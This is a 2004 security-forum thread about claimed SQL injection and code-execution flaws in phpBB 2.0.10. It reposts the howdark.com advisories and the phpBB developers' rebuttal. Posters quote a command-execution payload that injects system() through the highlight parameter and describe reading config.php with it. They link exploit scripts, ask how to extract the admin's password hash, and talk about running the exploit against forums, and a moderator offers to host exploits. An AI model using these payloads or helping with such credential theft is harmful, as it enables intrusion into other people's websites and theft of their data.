 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 54
 Members: 0
 Total: 54
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
vulns in phpbb 2.0.10 |
|
 Posted: Mon Nov 15, 2004 5:56 pm |
 |
|
| hebe |
| Advanced user |
 |
|
| Joined: Sep 04, 2004 |
| Posts: 59 |
|
|
|
 |
|
 |
|
| Quote: | | | | | | _ \ | |
| |_| | _____ __ | | | |__ _ _ __| | __
| _ |/ _ \ \ /\ / / | | | / _` | '__| |/ /
| | | | (_) \ V V / | |/ / (_| | | | <
\_| |_/\___/ \_/\_/ |___/ \__,_|_| |_|\_\
http://www.howdark.com
----------------------------------------------------------------------------------------------------------------------------------
// Information
----------------------------------------------------------------------------------------------------------------------------------
Author: How Dark
Date: October 14, 2004
URL: http://www.howdark.com
Affected Software: phpBB 2
Software Version: 2.0.* - 2.0.10
Software URL: http://www.phpbb.com
Attack: SQL Injection, allowing people to minipulate the query into pulling data
they should not previously be able too obtain. (Such as passwords)
Description: Requiring the account be a moderator, or having a moderation session
with the correct cookie to actually execute this attack, it is not that big
of an issue, but it still is there.
----------------------------------------------------------------------------------------------------------------------------------
xxx
----------------------------------------------------------------------------------------------------------------------------------
// Description
----------------------------------------------------------------------------------------------------------------------------------
Including a F (forum), with a MODE, but without a T (topic) leads to SQL error.
But because of topic turning all user input values into numbers, the injection is
useless, unless a way around this was found.
----------------------------------------------------------------------------------------------------------------------------------
xxx
----------------------------------------------------------------------------------------------------------------------------------
// URL
----------------------------------------------------------------------------------------------------------------------------------
modcp.php?mode=[mode]&f=1&t=[SQL]&sid=[your mod session]
----------------------------------------------------------------------------------------------------------------------------------
xxx
----------------------------------------------------------------------------------------------------------------------------------
// Line: 801
----------------------------------------------------------------------------------------------------------------------------------
$sql = "SELECT u.username, p.*, pt.post_text, pt.bbcode_uid, pt.post_subject, p.post_username
FROM " . POSTS_TABLE . " p, " . USERS_TABLE . " u, " . POSTS_TEXT_TABLE . " pt
WHERE p.topic_id = $topic_id
AND p.poster_id = u.user_id
AND p.post_id = pt.post_id
ORDER BY p.post_time ASC";
----------------------------------------------------------------------------------------------------------------------------------
// Line: 806
----------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------
// SQL Error
----------------------------------------------------------------------------------------------------------------------------------
Could not get topic/post information
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND p.poster_id = u.user_id AND p.post_id = pt.post_id
SELECT u.username, p.*, pt.post_text, pt.bbcode_uid, pt.post_subject, p.post_username FROM htf_posts p, htf_users u, htf_posts_text pt WHERE p.topic_id = AND p.poster_id = u.user_id AND p.post_id = pt.post_id ORDER BY p.post_time ASC
Line : 809
File : modcp.php
|
2nd
| Quote: | _ _ ______ _
| | | | | _ \ | |
| |_| | _____ __ | | | |__ _ _ __| | __
| _ |/ _ \ \ /\ / / | | | / _` | '__| |/ /
| | | | (_) \ V V / | |/ / (_| | | | <
\_| |_/\___/ \_/\_/ |___/ \__,_|_| |_|\_\
http://www.howdark.com
----------------------------------------------------------------------------------------------------------------------------------
// Information
----------------------------------------------------------------------------------------------------------------------------------
Author: How Dark
Date: October 1, 2004
URL: http://www.howdark.com
Affected Software: phpBB 2
Software Version: 2.0.* - 2.0.10
Software URL: http://www.phpbb.com
Attack: SQL Injection, allowing people to minipulate the query into pulling data
they should not previously be able too obtain. (Such as passwords)
Arbituary EXEC allows you, if you can get on to a new line, to execute
your own PHP, which can be fatal.
Description: Because of the way urldecode and magic quotes works,
it turns %2527 into %27, which is a single quote, and it
leaves it unslashed. This gives you a SQL Injection, leading
to arbituary PHP exec hole. But because you can't get outside
preg_replace because of magic quotes, this is very very useless.
----------------------------------------------------------------------------------------------------------------------------------
xxx
----------------------------------------------------------------------------------------------------------------------------------
// Description
----------------------------------------------------------------------------------------------------------------------------------
Highlighting %2527 on any topic.
----------------------------------------------------------------------------------------------------------------------------------
xxx
----------------------------------------------------------------------------------------------------------------------------------
// URL
----------------------------------------------------------------------------------------------------------------------------------
viewtopic.php?t=1&highlight=%2527
----------------------------------------------------------------------------------------------------------------------------------
xxx
----------------------------------------------------------------------------------------------------------------------------------
// Error
----------------------------------------------------------------------------------------------------------------------------------
Parse error: parse error, unexpected T_STRING in viewtopic.php(1109) : regexp code on line 1
Fatal error: Failed evaluating code: preg_replace('#\b(')\b#i', '\1', '>[POST TEXT HERE]<') in viewtopic.php on line 1109
--------------------------------------------------------------------------------------------------------- |
psoftx write that in the phpbb comunity
| Code: | We've have had and continue to receive reports based on a bugtraq email submitted by the "howdark.com" group. Please do not report these issues to us, not by PM, email nor via our security tracker.
The two "sql injection" issues are not sql injection issues, nothing can be done with them at all due to type casting (strings are forced to an integer type). The group admit this themselves but persist in claiming they are sql injection issues. The "solution" they give contains semantically incorrect SQL (you do not enclose values for integer field types in quotes).
The third issue, search highlighting, has been checked by us several times and we can do nothing with it at all. Again, that particular group admit likewise. In a future release of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our knowledge and as noted, testing) be taken advantage of and thus is not considered by us to be cause for an immediate release.
|
|
|
|
|
|
|
|
|
|
| Posted: Mon Nov 15, 2004 11:58 pm |
|
|
| jessica |
| Regular user |
|
|
| Joined: Sep 18, 2004 |
| Posts: 5 |
|
|
|
|
|
|
|
| Quote: | -----------------------------------------------------------------------------------------------------
// Updates
-----------------------------------------------------------------------------------------------------
Just a note on the phpBB finds, they are NOT SQL Injection issues,
they are just poorly coded errors, as I had stated.
This is just immature of the phpBB Group to say we were presistant
about these, considering they were not submitted to BugTRAQ because
we knew for a fact they were useless.
The highlight error, as I stated is not harmful under the circumstances
of the default code, but if presented with minor changes, which is known
to some widely known phpBB Boards, they could present problems.
The highlight error is NOT, and I repeat NOT, SQL Injection, I am sorry
for the misworded presentation. I found this awhile ago, and I asked
a friend, who is well knowledged about these subjects, what to label
this with the options I had for the phpBB Security Tracker, and this is
what he gave me.
I did not check over what I sent, stupidly, and that is how it was sent out.
Sorry for the incovience
Keep note, that these would not even be on BugTRAQ if phpBB were
not immature about the bug reports I gave them, and they mildly ignored. |
|
|
|
|
|
|
|
|
|
| Posted: Wed Nov 17, 2004 2:30 pm |
|
|
| LINUX |
| Moderator |
|
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
psoftx write that in the phpbb comunity
Code:
We've have had and continue to receive reports based on a bugtraq email submitted by the "howdark.com" group. Please do not report these issues to us, not by PM, email nor via our security tracker.
The two "sql injection" issues are not sql injection issues, nothing can be done with them at all due to type casting (strings are forced to an integer type). The group admit this themselves but persist in claiming they are sql injection issues. The "solution" they give contains semantically incorrect SQL (you do not enclose values for integer field types in quotes).
The third issue, search highlighting, has been checked by us several times and we can do nothing with it at all. Again, that particular group admit likewise. In a future release of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our knowledge and as noted, testing) be taken advantage of and thus is not considered by us to be cause for an immediate release.
----------------------------------
PHPBB developers read read read ERROR ERROR
WTF xD
Good work Jessica |
|
|
|
|
|
|
|
|
| Posted: Thu Nov 18, 2004 1:47 am |
|
|
| jessica |
| Regular user |
|
|
| Joined: Sep 18, 2004 |
| Posts: 5 |
|
|
|
|
|
|
|
Just a note, look how they edit their post now that there's a proof of concept, this one of the most dangerous phpbb exploits ever.
Proof of Concept:
http://www.howdark.com/phpbb2010.phps |
|
|
|
|
| Posted: Thu Nov 18, 2004 7:17 am |
|
|
| hebe |
| Advanced user |
|
|
| Joined: Sep 04, 2004 |
| Posts: 59 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| Posted: Thu Nov 18, 2004 8:03 am |
|
|
| LINUX |
| Moderator |
|
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
|
|
|
|
| Posted: Thu Nov 18, 2004 10:53 am |
|
|
| hebe |
| Advanced user |
|
|
| Joined: Sep 04, 2004 |
| Posts: 59 |
|
|
|
|
|
|
|
| jessica wrote: | Just a note, look how they edit their post now that there's a proof of concept, this one of the most dangerous phpbb exploits ever.
Proof of Concept:
http://www.howdark.com/phpbb2010.phps |
this only works in win servers ?
"/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd.")%252e%2527";
cmd? |
|
|
|
|
| Posted: Thu Nov 18, 2004 1:05 pm |
|
|
| jessica |
| Regular user |
|
|
| Joined: Sep 18, 2004 |
| Posts: 5 |
|
|
|
|
|
|
|
no, it'll work on most os's
It'll just limit it to what OS it is.. i.e: unix is ls, and windows is dir.
It isn't very useful because you are logged in as no user, so you don't have write permission or anything, so you can read like config.php (cat config.php on unix) and you have to view the page source since config.php has <? ?> and the page parses it thinking it's html.
But other then that you are pretty much out of luck.
CMD Example Script is here:
http://www.howdark.com/exploit |
|
|
|
|
| Posted: Thu Nov 18, 2004 1:11 pm |
|
|
| jessica |
| Regular user |
|
|
| Joined: Sep 18, 2004 |
| Posts: 5 |
|
|
|
|
|
|
|
And just to think phpBB devs reported me to my ISP for trying to help them with this.
assholes. |
|
|
|
|
| Posted: Fri Nov 19, 2004 3:15 am |
|
|
| LINUX |
| Moderator |
|
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
jessica you need host for exploits send pm  |
|
|
|
|
| Posted: Sun Nov 21, 2004 1:57 pm |
|
|
| sygma |
| Regular user |
|
|
| Joined: Nov 21, 2004 |
| Posts: 7 |
|
|
|
|
|
|
|
| Quote: | | &highlight=%2527.$poster=$dbname.%2527 |
is there a way i could make a SQL query and thus obtain the admin's hashed password ? |
|
_________________
[i]no word to save thee[/i] |
|
|
|
| Posted: Sun Nov 21, 2004 10:14 pm |
|
|
| kranium |
| Regular user |
|
|
| Joined: Jun 27, 2004 |
| Posts: 7 |
|
|
|
|
|
|
|
| sygma wrote: | | Quote: | | &highlight=%2527.$poster=$dbname.%2527 |
is there a way i could make a SQL query and thus obtain the admin's hashed password ? |
yes i wish i could do that too. i used the exploit in http://www.howdark.com/exploit/ but everytime i try some SQL query it shows me NOTHING  any ideas? |
|
|
|
|
| Posted: Mon Nov 22, 2004 9:34 pm |
|
|
| SteX |
| Advanced user |
 |
|
| Joined: May 18, 2004 |
| Posts: 181 |
| Location: Serbia |
|
|
|
|
|
|
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
| Posted: Tue Nov 23, 2004 3:59 am |
|
|
| LINUX |
| Moderator |
|
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
| SteX wrote: | | Dont work for me... |
what not work stex? i test work nice 
exploit work in all phpbb forums 2.0.* - 2.0.10 |
|
|
|
|
|
a |
|
| Posted: Tue Nov 23, 2004 2:33 pm |
|
|
| SteX |
| Advanced user |
|
|
| Joined: May 18, 2004 |
| Posts: 181 |
| Location: Serbia |
|
|
|
|
|
|
| What did you entered in SQL tab..? |
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 4
Goto page 1, 2, 3, 4Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
